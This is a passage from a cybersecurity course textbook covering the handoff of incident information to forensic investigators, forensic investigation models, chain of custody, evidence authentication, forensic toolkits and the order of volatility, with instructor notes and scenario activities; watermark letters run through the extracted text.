suggestions they put forth can be: encrypt the research and development server and every other
server that holds sensitive data; disable USB ports on certain at-risk hosts; mandate company-
lic
wide training for end users on best security practices; draft policies that mirror this training,
especially concerning best usage of passwords and the storage of those passwords; and, if
feasible, implement a DLP solution on the research and development server so that any
attempted exfiltration of data will be denied.
up
D
ot
N
o
D

TOPIC C
Hand Over Incident Information to a Forensic
Investigation
When an incident occurs, analysts may need to perform a variety of forensic activities, such as
e
collecting data and identifying evidence. As a first responder, there are a variety of tasks you'll need
to perform during and after an incident to ensure forensic analysts will be able to do their jobs
ut
effectively.
ib
The Duties of a Forensic Analyst
Computer forensic analysts are known by a variety of other job titles, such as forensic computer The Duties of a Forensic
tr
examiner, digital forensic examiner, and computer forensic detective. Forensic analysts might work Analyst
for the police or a security service, a bank, a computer security service organization, or within a
is
cybersecurity team in a large organization. They use their technology and investigative skills to
recover information from computer systems, memory, and storage, possibly working in cooperation
D
with law enforcement officials to investigate cyber crimes or extract electronic evidence related to
other types of crime, or to analyze evidence (as an expert witness, for example) to help organizations
or individuals defend themselves in a legal case.
or
Forensic analysts might be involved in investigations focusing on a wide variety of incursions or
violations such as hacking; terrorism; political, industrial, or commercial espionage; employee theft
of sensitive company information; online fraud; and illegal pornography. Forensic analysts may also
be called upon by IT technology or security groups to assist in planning IT systems and processes to
e
ensure that evidence will be properly handled during a cybersecurity incident.
at
As part of a CSIRT, the forensic analyst may play a number of roles following a security incident or
in general support of cybersecurity, such as:
lic
• Investigating and reconstructing the cause of a cybersecurity incident, which might include tasks
in any or all phases of the forensic process: collection, examination, analysis, and reporting.
• Investigating whether any crimes, compliance violations, or inappropriate behavior has occurred.
up
• Following forensic procedures to protect evidence that may be needed if a crime has occurred.
• Determining if sensitive, protected data has been exposed.
• Contributing to and supporting processes and tools used to protect evidence and ensure
compliance.
D
• Supporting ongoing audit processes and record maintenance.

When you understand the duties that a forensic analyst is responsible for, you will be better able to
ot
communicate and hand off your results to them.

N
Communication of CSIRT Outcomes to Forensic Analysts

As a CSIRT member, you may be called upon to work closely with forensic analysts following an Communication of
o
incident. Remember your purpose as an incident responder is to return your operations to normal, CSIRT Outcomes to
whereas forensic personnel are concerned with gathering evidence to use in the possible prosecution Forensic Analysts
D
of a crime. However, while restoring operations, you will undoubtedly take note of attacks and Point out to students that
vulnerabilities that you identify in the process. This information may be vital to a forensic the transition from
investigation, and failing to present it to the forensic team may impede their efforts. incident response to
forensic investigation is
One of the first goals of this collaboration is to actually determine if a forensic investigation is not necessarily a linear
warranted. This determination should be supported by strong policy: What sort of monetary loss or process; the actions of
theft of property should be considered actionable? Does your policy also include an evidence both teams are often
intertwined.
Lesson 10: Responding to Cybersecurity Incidents | Topic C

threshold the investigation needs to meet to be viable? You may not be the one to make this
decision, but the decision may depend on your findings during an incident.
Consider the following when communicating your incident outcomes to the forensic team:
• Designate a liaison who can be the forensic team's point of contact. This contact will do all of
the communicating with the forensic team. This way, your CSIRT will have a single, authoritative
voice with which to communicate your results, rather than fragmented and possibly
contradictory voices.
• Make sure the forensic team has a good idea of the scope of the incident. They need to know
e
what assets were affected and what business processes were disrupted. You may not know all of
this, but anything you can give the team is important.
ut
• Detail all the individual physical and virtual assets you believe were affected by the incident. Also
explain why you think each particular asset was affected.
ib
• Detail when and how malware was quarantined to stop its spread in the network. The forensic
team can use this quarantined malware as evidence.
• Describe any containment, mitigation, or recovery procedures performed on devices. If there is
tr
no one-to-one copy of a drive or other device, the forensic team may need to rely on the affected
system as evidence. Being able to separate incident response actions from malicious ones will
is
make it easier for the team to identify the relevant information.
• Explain to the forensic team the tools you used to respond to the incident. What does each one
D
do? Can you think of any issues they may present to the evidence collection process? Using the
malware example previously mentioned, what if your anti-malware solution deletes malware
outright, rather than risk quarantining it?
or
• Give what information you can about the timing of each event in the incident. When did you
first notice the incident? When did you begin your response? When did you start and finish your
containment/mitigation/recovery efforts? The timings are often automatically generated through
logs and other event reporting solutions, but you may need to provide some timeline information
e
manually.
at
Guidelines for Handing Over Incident Information to a Forensic

Investigation
lic
Guidelines for Handing Follow these guidelines when you hand over incident information to a forensic investigation.
Over Incident
up
Information to a Forensic Hand Over Incident Information to a Forensic Investigation

Investigation
When handing over incident information to a forensic investigation:
• Draft an AAR that details the lessons you've learned in the wake of the incident.
D
• Review any existing policy that guides you in handing over results to a forensic team.
• Establish meetings with other teams, including the forensic team, to determine how to share
ot
information.
• Determine who should be the point of contact for ongoing collaboration between teams.
• Set expectations that forensic investigators may need to interview members of the CSIRT during
N
their investigation.
• Discuss what you need from the other teams (information, equipment, etc.), and what they need
from you.
o
• Decide whether new policies need to be generated as a result of the incident or if the existing
D
policy needs to be altered.

• Work with the forensic team to determine what data you've collected during an incident is
relevant to a potential investigation, and what is not.

ACTIVITY 10-4
Handing Over Incident Information to a
Forensic Investigation
e
Scenario
ut
You've concluded a breach has occurred, and you've done what you can to stop it and return
operations to normal. Suspecting that Develetech will want to weigh the possibility of pursuing legal
action, you and your CSIRT will prepare to hand off your results to a forensic investigation team.
ib
Sharing this information with this team accurately and efficiently will greatly assist their efforts.
Activity: Handing Over
tr
Incident Information to a
1. How do the goals of a forensic investigator differ from that of a first Forensic Investigation
is
Use this slide to
responder? summarize the incident
A: Answers may vary, but the most clear difference is that a first responder is concerned with to students. This will
D
detecting an incident and stopping it, thus returning operations to normal; whereas a forensic help them keep the
investigator is focused on evidence, as well as understanding the nature of an incident to pursue details fresh in their
punitive actions or determine that no such action should be taken. minds.
2. or
Despite the differences in goals, how do the two disciplines overlap?
A: Answers may vary, but both an incident responder and a forensic investigator will need to be
e
involved in securing and isolating assets, sharing information about the possible source and
vector of an attack, and reconstructing a timeline of events surrounding and including the incident.
at
3. What are some of the best practices that you can employ when
communicating your results to Develetech's forensic team?
lic
A: Answers will vary. First, the CSIRT will want to designate a liaison. Although both teams can meet
as a whole, this liaison will be an ongoing point of contact for the forensic team to consult with.
This point of contact should be the authoritative voice of the team, able to bridge both the needs of
up
the CSIRT and those of the forensic team. The CSIRT should also communicate the scope of the
incident: every asset affected, every employee involved, and so on. This will ensure that the
forensic team does not have an incomplete picture from which to draw evidence. It's also
important that the CSIRT describe the techniques and tools they used to contain and mitigate the
D
incident, as these could end up affecting the investigation.
4. What specifically do you need to give the forensic team so they have all the
ot
information they need to do their work?

A: Answers may vary, but you need to send them all the relevant event and network logs from that
N
morning and the failed remote connection attempt from the night before; hand over custody of
Pat's workstation and the research and development server, along with a list of activities the
CSIRT performed on these assets; and give them the AAR that details exactly what you know so
o
far about the incident.

D

Summary
In this lesson, you prepared for and effectively responded to a cybersecurity incident, including tasks
you must perform to ensure that forensic analysis can be conducted effectively after the event.
use the social Share a recent security incident you're familiar with and the nature of the
networking tools response.
provided on the CHOICE
e
A: Answers will vary. If no one volunteers to share an incident, be prepared to provide one from your
Course screen to follow experience.
ut
the course is completed How did forensics play a role during the incident response process?
and resources to support A: Answers will vary. Depending on the severity or nature of the incident, some organizations may not
ib
continued learning. pursue any sort of forensic investigation. They may simply be interested in containing the situation
and improving upon their security, not finding out who was responsible. This may also be the case if
the culprit is easily identified. For those that did pursue an investigation, they might mention that the
tr
incident responders and forensic investigators needed to closely cooperate to ensure that both teams
could do their jobs effectively. The tasks performed by both of these teams often overlap, so
is
communication of expectations is important.
D
or
e
at
lic
up
D
ot
N
o
D
Lesson 10: Responding to Cybersecurity Incidents |

11 Investigating
Cybersecurity Incidents
e
ut
ib
tr
is
Lesson Introduction
D
Following a cybersecurity incident, you may be called on to perform forensic analysis, such
as collecting evidence and determining how and why the incident occurred, and who caused
it.
Lesson Objectives
or
e
at

• Create a plan for performing forensic investigations after incidents occur.
lic
• Collect and analyze electronic evidence in a secure manner to prevent tampering or

compromise.
• Implement measures to follow up on an investigation.
up
D
ot
N
o
D

TOPIC A
Apply a Forensic Investigation Plan
Your organization may have legal obligations when investigating a cybersecurity incident, and you
will certainly have obligations to your organization and its stakeholders to get to the bottom of the
incident. It's important to have a plan to ensure you handle forensics properly, effectively, and in
e
compliance with applicable regulations.
ut
Forensic Analyst Responsibilities
ib
Forensic Analyst In any given day, a forensic analyst might be called upon to do the following tasks.
Responsibilities
Task Examples
tr
Follow legal • Ensure all forensic investigation activity is executed according to all
is
procedures for federal and local laws, safety regulations, and privacy standards, and in
protecting evidence line with company policies.
D
• Protect evidence by filling out a chain of custody form.
• During or after an incident, secure IT systems and hardware so they
cannot be tampered with.
Collect potential
sources of evidence
or
• Train others on proper procedures for protecting evidence.
• Use various forensic methods and specialist computer programs to
find, recover, and copy data that may have been hidden, encrypted,
e
damaged, password protected, or buried within massive datasets.
• Dismantle and rebuild systems, if necessary, to recover lost data.
at
• Follow data trails through networks and systems to uncover links

between individuals or groups.
lic
Analyze evidence • Analyze storage, memory, logs, and other data sources to detect
information or user patterns that may be used as evidence of illegal
activity.
up
• Analyze mobile phone records to trace devices to a particular location

or to rule them out.
• Transfer evidence into a format that can be used in a trial or for other
D
legal purposes.
Communicate and • Carefully document each stage of an investigation, and provide
ot
produce detailed reports.

documentation • Coordinate with other forensic experts to ensure that current
intelligence information is communicated and disseminated in a timely
N
manner.
• Present technical findings to managers, law enforcement
organizations, and clients.
o
Support prosecution • Assist detectives and other officials in analyzing data and evaluating its
D
relevance to the case under investigation.

• Act as a technical or expert witness in a court case.
• Provide testimony in court regarding evidence collected.
Maintain technology • Stay current on cyber threats and forensic methodologies and
and forensic skills technologies.
Lesson 11: Investigating Cybersecurity Incidents | Topic A

Forensic Investigation Models

Most digital forensic models and frameworks are merely proposed and not widely adopted as an Generic Computer
industry standard. Many of these models and frameworks are inherited from traditional forensic Forensic Investigation
procedures that have been used in criminal investigations for decades. These models are then Model (2011)
converted to be more computer applicable, and some target even more specific contexts.
The following table lists some of the more prominent digital forensic models and their phases.
Model Phases
e
Abstract Digital Forensic Model (Reith, et al., 2002) 1. Identification
ut
2. Preparation
3. Approach strategy
ib
4. Preservation
5. Collection
6. Examination
tr
7. Analysis
is
8. Presentation
9. Returning evidence
D
The Enhanced Digital Investigation Process Model 1. Readiness
(Baryamureeba & Tushabe, 2004) 2. Deployment
3. Traceback
A Hierarchical, Objectives-Based Framework for the

or
4.
5.
1.
Dynamite
Review
Preparation
e
Digital Investigations Process (Beebe & Clark, 2004) 2. Incident response
at
3. Data collection
4. Data analysis
lic
5. Findings presentation
6. Incident closure
Systematic Digital Forensic Investigation Model 1. Preparation
up
(Agarwal, et al., 2011) 2. Securing the scene

3. Survey and recognition
4. Documenting the scene
D
5. Communication shielding
6. Evidence collection
7. Preservation
ot
8. Examination
9. Analysis
N
10. Presentation
11. Result and review
o
Generic Computer Forensic Investigation Model (Yusoff, 1. Pre-process

et al., 2011) 2. Acquisition and preservation
D
3. Analysis
4. Presentation
5. Post-process

Model Phases
ACPO Good Practice Guide for Digital Evidence 1. The principles of digital
(Association of Chief Police Officers, 2012) evidence
2. Plan
3. Capture
4. Analyze
5. Present
e
Integrated Digital Forensic Process Model (Kohn, et al., 1. Documentation
2013)
ut
2. Preparation
3. Incident
4. Incident response
ib
5. Digital forensic investigation
6. Presentation
tr
Proposed Model for Digital Forensic Investigation (Mir, 1. Planning
et al., 2016) 2. Identification
is
3. Collection
4. Reconnaissance
D
5. Transport and storage
6. Examination
or 7. Analysis
8. Proof and defense
9. Archive storage
10. Presentation and results
e
at
If you'd like to provide

your students with a
more in-depth look at
lic
each phase of these

models, consider
searching online for the
published papers.
up
D
ot
N
o
D
Figure 11-1: The Generic Computer Forensic Investigation Model (GCFIM) consolidates many of
the phases that are interchangeable between forensic models. Note the ability to return to a
previous phase.

OLE Computer Forensics Standard

Although not technically a model, the document "Searching and Seizing Computers and Obtaining
Electronic Evidence in Criminal Investigations" is a de facto standard for computer forensics. It is
published by the U.S. Department of Justice's Office of Legal Education (OLE) and is available at:
https://www.justice.gov/sites/default/files/criminal-ccips/legacy/2015/01/14/
ssmanual2009.pdf.
Forensic Investigation Preparation
e
The following is a list of actions you can take to prepare for a forensic investigation: Forensic Investigation
ut
• Know the hardware used in your organization. Preparation
This might be a good
This can be everything from workstations, network devices, mobile devices, removable media, place to remind students
ib
and more. All these are potential sources of evidence, and they all have unique characteristics. Be about the usefulness of
aware of how each type of hardware can assist an investigation. site books in recording
• Know the operating systems used in your organization. asset and configuration
tr
information.
Different operating systems fulfill different purposes, and likewise, each may require a different
is
approach to evidence collection and analysis. Of particular concern is the difference in file
system types between Windows®, macOS®, and Linux® environments.
• Know the software used in your organization.
D
The more familiar you are with the programs personnel and devices use on a day-to-day basis,
the easier it will be to extract relevant information from these programs.
• Know the tools of the trade.
or
You shouldn't select forensic utilities after an incident occurs, but rather beforehand. This way,
you won't be scrambling to learn a new tool in the middle of your investigation.
e
• Know the virtualized environments in your organization.
Performing forensic investigations on virtual machines (VMs) is more of a challenge than
at
investigating a local machine because of the distributed nature of virtual environments. There
may be only small traces of evidence left on multiple hosts in a storage cluster, rather than a
lic
single storage drive you can easily create an image from.

• Know the systems that must stay active during an investigation.
There are times when you won't necessarily have the opportunity to isolate a system when you've
up
marked it as evidence. Some systems must stay active for business reasons, and for technical
reasons you may not be able to replicate their contents to an isolated environment. Consider how
an active system might affect the integrity of the evidence that resides on it.
• Know the applicable laws and regulations.
D
Failing to understand cyber laws may render your investigation pointless. You should stay
current on all applicable computer-related laws and regulations so you can quickly identify when
ot
an investigation is and is not legally viable.

• Ensure that there is a policy in place and that you are following it.
N
Policy in the organization, and whether or not it has been followed consistently, can make a
significant difference in terms of whether action (legal, administrative, or otherwise) can be taken
against an entity once forensic data has been collected. There are many real-life cases where, after
o
data was collected, the perpetrator was not prosecuted/penalized because either no policy
specifically addressing acceptable use was in place or because the investigator(s) overstepped
D
their legal bounds.
Investigation Scope
There are times in an investigation when you come across activity beyond what you had originally Investigation Scope
set out to investigate. For example, your organization has been the victim of a denial of service
(DoS) attack. You think you've narrowed down possible culprits to internal employees, and you

move to confiscate specific workstations that you suspect carried out the attack. In the process of
investigating these workstations, you come across activity forbidden by company policy, as you find
evidence of a workstation's user posting company credentials on a public web forum. This suggests
another incident has taken place, possibly separate from the one you're investigating.
How should you plan to address something like this? This often comes down to what approach
management wants to take. You should ask your supervisor if you should continue focusing on the
main investigation, if you should start a new investigation, or if you should incorporate this new
evidence into the existing investigation. You may need to dig deeper and find out if this new
evidence is related to the current investigation before your supervisor can make an informed
e
decision. Taking on too large a scope could muddy your investigation, especially if your organization
ut
is low on qualified forensic personnel and you don't receive much help. If you don't consult with
your supervisor, you could place yourself, the investigation, and the evidence in jeopardy.
ib
Timeline Generation and Analysis
tr
Timeline Generation and A significant part of your forensic investigation will involve tying events to specific times so you
Analysis may establish a consistent and verifiable narrative. The visual representation of events happening in
chronological order is called a timeline, and it can be a powerful tool in your forensic toolkit. Being
is
Consider mentioning to
students that modified, able to analyze a timeline will give you a holistic perspective of the incident that wouldn't otherwise
accessed, and created be possible.
D
(MAC) times are
updated differently Timelines can be represented in a number of different ways, and a simple but effective way is by
based on the file system using spreadsheets. With a spreadsheet, you can sort and manage large amounts of data while
preserving the relevance of the time of an event or evidence. Typically, you'd tag each event or piece
used.
or
of evidence by several important identifiers. For example, you can list files you find in a computer's
web browser cache by their file name, date/time created, date/time last accessed, and date/time last
modified.
e
at
lic
up
Figure 11-2: A spreadsheet of a computer's web browser cache with relevant timeline
information.
D
However, large stores of evidence can prove unwieldy in a simple spreadsheet. Many forensic tools
have their own timeline generation features that can assist you in collecting file metadata and event
information automatically. Software like log2timeline can parse millions of artifacts on a drive and
ot
essentially generate a timeline of every recorded event on a particular system. This is called a super
timeline, and without the assistance of a tool, it can be infeasible to generate manually.
No matter what tools you use, you need to ensure the clocks from all relevant sources are
N
synchronized; if they can't be synchronized, then you must note any time offsets so that events are
placed in the proper context.
o
Note: In addition to using tools to list specific items in the context of time, you can also
perform a more qualitative analysis of the timeline of an event. For example, your report could
D
be in a narrative form, in which you essentially tell a story about what you believe happened and
when.

Authentication of Evidence
Gathering evidence does not automatically mean the evidence is admissible in a court or that it is Authentication of
completely validated in an investigation. The evidence must be authenticated or confirmed to be Evidence
exactly what a proponent of that evidence claims it is. For example, you may present a drive image
as evidence of an intrusion to a court, but until a technical expert in the employ of the court can
verify the hash of that image, it is not authenticated.
As you create a forensic investigation plan, you should consider how the various types of evidence
you can collect may be authenticated. This will help shape your investigation by underscoring its
e
crucial findings while trimming the weaker or inconclusive aspects. Take the example of an
ut
operating system log recording that a user account, A. Jones, was signed in as an attack was
launched from that host. If the access control mechanisms in place are weak or non-existent, then
the court will be much less inclined to authenticate this as evidence that employee Aaron Jones
ib
signed in, and not someone impersonating him.
You may also need to concede that some evidence simply cannot be authenticated, and therefore
will not be admissible. Different jurisdictions have different standards for authentication, and these
tr
standards may be too strict for you to meet with specific types of evidence. Sensitive network
transmissions, like financial transactions, are particularly hard to authenticate because of their
is
confidential and ephemeral nature. Also recognize that some evidence—hearsay, especially—will
not necessarily be admissible even if it is authenticated.
D
Chain of Custody
or
The chain of custody is the record of evidence handling from collection, to presentation in court,
to disposal. The evidence can be hardware components, electronic data, telephone systems, and
more. The chain of evidence reinforces the integrity and proper custody of evidence throughout the
Chain of Custody
Consider showing
students a chain of
e
entire investigative process. Every person in the chain who handles evidence must log the methods custody form. For
and tools they used. This can be done manually, like forensic personnel filling out a form, or it can example, you can
at
be done by an automated process that generates and maintains audit trails of actions taken. Both search for DA Form
approaches may be used at different points in the investigation. 4137, which is provided
by the U.S. Department
lic
When security breaches go to trial, the chain of custody protects an organization against accusations of the Army.
that evidence has either been tampered with or is wholly different than it was when collected.
Note: The chain of custody is a legal term that predates digital forensics, but the same basic
up
principles apply.
D
ot
Figure 11-3: The chain of custody from evidence collection through disposal.
N
Example
o
Consider the following scenario:

1. Adam, the security administrator, detects an abnormal amount of outgoing traffic from a
D
database that stores password hashes. No one besides the security team is authorized to access
this database. The destination IP of the outgoing traffic is attached to the workstation of an IT
employee who is currently on vacation.
2. Adam notifies his boss, Barry, of the abnormal traffic. Barry asks security engineer Emily to take
snapshots of the database in its current state, and cautions her to make sure backups from at
least a week prior are retained.

3. Emily uses her workstation to remotely log in to the server with the affected database and takes a
snapshot. She then extends the retention period of all backups saved in the past week.
4. Meanwhile, Barry commandeers the IT workstation and locks it in a security closet to which only
he, the building manager, and the CEO have keys.
5. After Emily is finished, Barry takes her workstation and the server with the affected database and
locks them in the same closet.
6. Barry asks the building manager for the security camera footage of the past 24 hours, and places
a copy of this footage in the closet.
7. Barry writes up an incident report and details every step of the process, mentioning every
e
individual involved in the evidence collection.
ut
Analysis
Assuming the camera footage shows someone accessing the absent employee's workstation, this
ib
incident may go to trial and charges may be levied against the person identified on camera.
However, if Barry had never documented the chain of custody of each piece of evidence as it passed
tr
from his coworkers' hands to his own, the suspect could bring reasonable doubt to the legitimacy of
this evidence. What if the database logs that record the outgoing traffic were tampered with to point
is
to an erroneous IP address? What if the camera footage was not from that day, but previous footage
of the suspect using the employee workstation with permission? These are questions a defense team
will raise to cast doubt on the investigation. Since Barry wisely kept the chain of custody on record,
D
it will be much more difficult for the defense to convince the judge the evidence should be
inadmissible in court.
Communication and
or
Communication and Interaction with Third Parties
Depending on your organization's available resources and the extent of an incident, you may need to
e
Interaction with Third contract with third-party forensic investigators and analysts. Some organizations are in the business
Parties of forensics, and may provide you and your team invaluable insight into the processes and
at
procedures of incident investigation. If this is the case, you will likely need to work with these third-
party forensic experts as a team.
lic
Effective collaboration with a third party means sharing information that the third party needs to
successfully complete their assigned duties. You should also be in constant contact with the third
party to not only check on their progress, but also to add their findings to the overall narrative of
up
the investigation. If one or all parties stay isolated and fail to share their findings in a timely fashion,
the investigation may end up being ineffective and inefficient. You should agree to a plan or
schedule that keeps communication consistent.
Another third party that may assist you in your investigation is law enforcement. Law enforcement
D
personnel are likely to have more experience with criminal cases, but they may not have the
technical expertise or intra-organization knowledge that you do. When you involve law enforcement,
you also run the risk of them seizing evidence for long periods of time, even after the case is
ot
concluded. You or other members of your organization must determine if this would impact
business operations enough to be too risky.
N
Forensic Toolkit: Open Source Software

o
Forensic Toolkit: Open Establishing a toolkit is an important part of preparing for a forensic investigation. You should not
Source Software just limit yourself to tools with a narrow scope; your toolkit should be broad enough to cover the
D
You don't necessarily many different dimensions of forensic analysis. One tool will not necessarily cover all of these
need to discuss these dimensions. For example, a drive image is pointless without a tool to hash that image. If your toolkit
tools in detail. The intent isn't comprehensive, you can be caught off guard in the middle of an investigation.
is to make students
aware of their options. The following table describes some of the most common open source software tools used to collect
and analyze evidence.

Software Tool Supported Operating Description

System(s)
The Sleuth Kit (TSK) Cross-platform A general-purpose forensic tool. It has a

graphical front-end called Autopsy.
CAINE n/a A Linux distribution that includes existing
forensic software.
SANS Investigative Ubuntu (Linux) A suite of tools developed by the SANS
e
Forensic Toolkit Institute that comes with a number of freeware
(SIFT) applications used in forensic investigations.
ut
Digital Forensics Cross-platform A general-purpose forensic tool that can be used
Framework (DFF) by non-experts in addition to professionals.
ib
Volatility Windows, Linux A tool used to analyze volatile memory like
RAM.
tr
Rekall Cross-platform A forensic analysis framework that supports live
volatile memory analysis on multiple platforms.
is
md5sum Windows, Linux A tool that calculates the Message Digest 5
(MD5) hashes of a file or group of files.
D
sha256sum Windows, Linux A tool that calculates the Secure Hash
Algorithm (SHA-256) hashes of a file or group
md5deep Cross-platform
of files.
or
Similar to md5sum and sha256sum, but includes
additional features, like the ability to traverse
directory structures recursively. Supports
e
SHA-1, SHA-256, and other algorithms beyond
at
just MD5.
Foremost Linux A data recovery and file carving tool.
lic
TestDisk Cross-platform A data recovery tool.

PhotoRec Cross-platform A data recovery and file carving tool.
up
log2timeline Cross-platform A timeline generation tool.

Wireshark Cross-platform A packet capture and analysis tool that can be
useful for network forensics.
D
Kali Linux Forensic Mode

Kali Linux™ has several live boot options, one of which is Forensic Mode. In Forensic Mode, Kali
ot
Linux never accesses or automatically mounts internal drives, nor does it use swap space on these
drives. Forensic Mode also disables the automatic mounting of removable media like USB thumb
N
drives. These restrictions ensure that the operating system does not initiate an action that could
compromise the integrity of forensic evidence during analysis.
o
Forensic Toolkit: Proprietary Software

D
In addition to open source forensic software, there are some proprietary software solutions as Forensic Toolkit:
outlined in the following table. Proprietary Software

Software Tool Supported Operating Description

System(s)
EnCase Windows A tool that supports a wide range of forensic

methods, including evidence collection, analysis,
and reporting.
Helix3 n/a A Linux distribution that includes various
forensic software tools.
e
Forensic Toolkit® Windows A multi-purpose utility developed by Exterro
(FTK®) (previously AccessData) that can scan a storage
ut
drive and detect behavior that may be of interest
to an investigator, such as deleted
communications. It has a program that images a
ib
drive and automatically creates a hash of that
image. It also includes a password cracking
tr
utility.
AD eDiscovery n/a A platform developed by Exterro that supports
is
the full electronic discovery (e-discovery)
process. It also enables an investigator or auditor
D
to search or audit large sets of structured or
unstructured data.
Forensic Explorer Windows A tool with a wide variety of features, including
Binalyze AIR Windows

or file carving, hashing, keyword searching, and
more.
A suite of digital forensics tools with automated
e
incident response capabilities. It can integrate
with existing SIEM/EDR systems as well as
at
Active Directory environments.

Elcomsoft Forensic Windows A cryptographic tool that can be used to crack
lic
Disk Decryptor certain encrypted containers by retrieving

passwords in memory.
WindowsSCOPE Windows A tool used to analyze volatile memory like
up
RAM.
HashMyFiles Windows A freeware application that calculates the MD5
and SHA hashes of a file or group of files.
D
Forensic Toolkit: Physical

ot
Forensic Toolkit: In addition to the various software programs available, you also need to consider collecting physical
Physical tools to place in your forensic toolkit.
N
Physical Tool Description

o
Digital forensics To perform any kind of meaningful collection and analysis of evidence,
workstations you'll need one or more computers that act as the hub for your forensic
D
investigation. These workstations need to be access controlled, hardened,

and isolated from any production systems that could be part of the
incident. They should also be stocked with up-to-date versions of forensic
software, like the applications mentioned in the previous table.

Physical Tool Description

Cables and drive After you collect an internal drive as evidence, you'll want to analyze that
adapters drive from your forensics workstation, rather than the computer the drive
came from. Instead of installing it directly in your forensics workstation,
it'll be a better use of your time to connect it externally through the
necessary cables and adapters. For example, there are cables and adapters
that can enable you to connect a Serial Advanced Technology
Attachment (SATA) drive to both an AC power source and a USB port
e
for data transfer. Rather than connect the drive directly to your forensics
workstation, you'll want to connect it to a write blocker so you can create
ut
an evidence file of the drive.
Removable media In some cases, you'll need to quickly offload or transfer data to a
ib
removable storage device so that a backup of the evidence can be stored
quickly and securely. For example, if you image a drive suspected of
compromise, you can store that image on removable media so that it can
tr
be easily moved to another workstation or provided to other personnel
involved in the investigation. Any removable media you use in this
is
manner should be completely wiped beforehand to prevent any
contamination of evidence.
D
Write blockers Contamination of evidence is a significant concern among forensic
investigators. One of the most crucial tools in preserving the integrity of
evidence is a write blocker. A write blocker is a drive controller that
or
accesses a drive in read-only mode and prevents the operating system
from writing data to the drive. If even a single bit changes on a drive as a
result of the investigation, the authenticity of evidence may be called into
question—write blockers prevent this from happening.
e
Mobile device forensics Forensic analysis of mobile devices is a relatively new field, but the rising
at
tools popularity of mobile computing means that it is an inevitable aspect of

the forensic process. Many of the tools available, like Cellebrite UFED
lic
and MOBILedit Forensic, include hardware components that physically

connect to smartphones and tablets. They also provide investigators with
software-based management interfaces.
up
Cameras High-quality digital cameras are necessary to uphold the integrity of

evidence during a forensic investigation. You may be called on to take
photographs of affected devices, or, if there was a physical intrusion,
photographs of a crime scene. Poor-quality cameras can obscure the
D
relevant detail in a picture, making it more difficult for you to prove some
aspect of an incident.
ot
Crime tape and In a physical incident, crime tape can help you cordon off specific areas
tamper-proof seals of a building or another environment while the investigation is underway.
This will deter employees and customers from wandering into the area
N
and contaminating evidence. Tamper-proof seals will help you clearly

identify if an evidence bag or other forensic container has been accessed
by unauthorized personnel, which can likewise deter people from
o
compromising the integrity of evidence.

D
Guidelines for Applying a Forensic Investigation Plan

Guidelines for Applying
Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the a Forensic Investigation
CHOICE Course screen. Plan
Follow these guidelines when applying a forensic investigation plan.

Apply a Forensic Investigation Plan

To apply a forensic investigation plan:
• Develop a plan for who (such as which internal staff or external parties) will handle each type of
forensic task, based on required skills and abilities, cost, response time, and data sensitivity.
• Create and maintain forensic investigation guidelines and procedures based on the organization's
policies. Documentation should be provided to incident response personnel and any external
teams identified as participants in forensic activities to ensure the organization's policies are
followed.
e
• To ensure you'll be able to collect as much digital evidence as possible, make sure that systems
are configured when deployed in advance of any incident or investigation to maximize the
ut
amount of collectable data. For example, enable a computer's or device's auditing services.
• The organization should develop its own capability to perform digital forensics. The skills
ib
required for this capability are valuable in a variety of circumstances, not only in incident
response situations. For example, forensic skills may be useful in troubleshooting operational
problems; supporting ongoing maintenance of audit records; recovering data when there are
tr
system problems or user errors; investigating cyber crimes and inappropriate behavior;
reconstructing computer security incidents; and monitoring actions conducted by third parties,
is
such as police investigators, on the organization's systems.
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 11-1
Applying a Forensic Investigation Plan
Scenario
e
Under the Chief Information Security Officer's (CISO's) authorization, the cybersecurity incident
response team (CSIRT) has handed off their work to you, a forensic investigator for Develetech.
ut
Your company's forensic model follows this basic pattern:
1. Preparation
ib
2. Acquisition
3. Analysis
tr
4. Presentation and review
Using this model, you'll begin to develop a plan for each phase of the process. This plan will help Activity: Applying a
is
you perform your investigative duties to the best of your ability, and hopefully will make it easier for Forensic Investigation
Plan
you to discover the source of this data breach.
If necessary, refresh
D
students' memories of
the incident scenario by
1. What must you know about Develetech's computing environments to prepare showing them the
for a forensic investigation?
or
A: Answers will vary. You need to know the following about the systems affected by the incident: the
type of hardware in place; the operating systems and other software used on the computers; any
activity slides from the
previous lesson.
e
environments that may have been virtualized versus those that are physical; the forensic tools of
the trade that can assist you in your duties; any of Develetech's systems that must stay active
at
during an investigation to support business needs; and all applicable laws and regulations that
could impact your work.
lic
2. Pat's workstation has a real-time anti-malware scan running when the

computer is powered on. One of your team members had the idea of looking
at those logs, even though no malware was detected in the incident response
up
phase. He reviewed the logs, and the smartwatch_schematic3.png file was

detected as the scanner swept the USB drive that was attached at the time of
intrusion. Because the anti-malware solution keeps logs of some of the files it
D
scans, when it scanned the USB drive, it captured the names of some other
files that were on the USB drive.
ot
How can an analysis of these anti-malware logs help your investigation?

A: Answers may vary, but the team might be able to discover identifying information from the titles of
N
the other files on the USB drive. This could lead them to the culprit or at least the owner of the
USB drive.
o
D

3. None of the file names logged by the anti-malware solution revealed any
identifying information. However, the team searched for each file name in the
company's network storage spaces provisioned to each employee. This
search produced one result: the file my_contract_invoice3.docx, which was
enumerated in the anti-malware scan, exists in the network storage space of
an employee named Rupert. Your investigation isn't done, but you think
you've gathered enough evidence to present to your supervisor so that you
can take action.
e
What are some of the important steps involved in upholding the integrity of
ut
your investigation? How can you better convince your audience of your
findings?
ib
A: Answers may vary, but observing the chain of custody is a must for any investigation. The
movement of Pat's workstation and the research and development server should be documented
tr
based on who last worked with each computer and what exactly was done. This process should
be ongoing. Furthermore, you need to consider how the evidence you found so far can be
authenticated. You need to demonstrate to your supervisor, and possibly to law enforcement in
is
the future, that the evidence you gathered has not been tampered with. One example is by
hashing the images of each drive so that an outside party can verify that hash when the evidence
D
makes its way into their custody.
or
e
at
lic
up
D
ot
N
o
D

TOPIC B
Securely Collect and Analyze Electronic Evidence
You have a forensic investigation plan in place. Now, as you collect and analyze evidence, you'll
need to ensure you follow certain protocols to preserve data in a useful and secure format.
e
Order of Volatility
ut
Data is volatile, and the ability to retrieve or validate data after a security incident depends on where Order of Volatility
it is stored in a location or in a memory layer of a computer or external device. For example, data on
ib
backup CDs or thumb drives can last for years, while data in random-access memory (RAM) may
last for only nanoseconds.
tr
The order in which you need to recover data after an incident before the data deteriorates, is erased,
or is overwritten, is known as the order of volatility. From most volatile to least volatile, the general
is
order of volatility for storage media is:
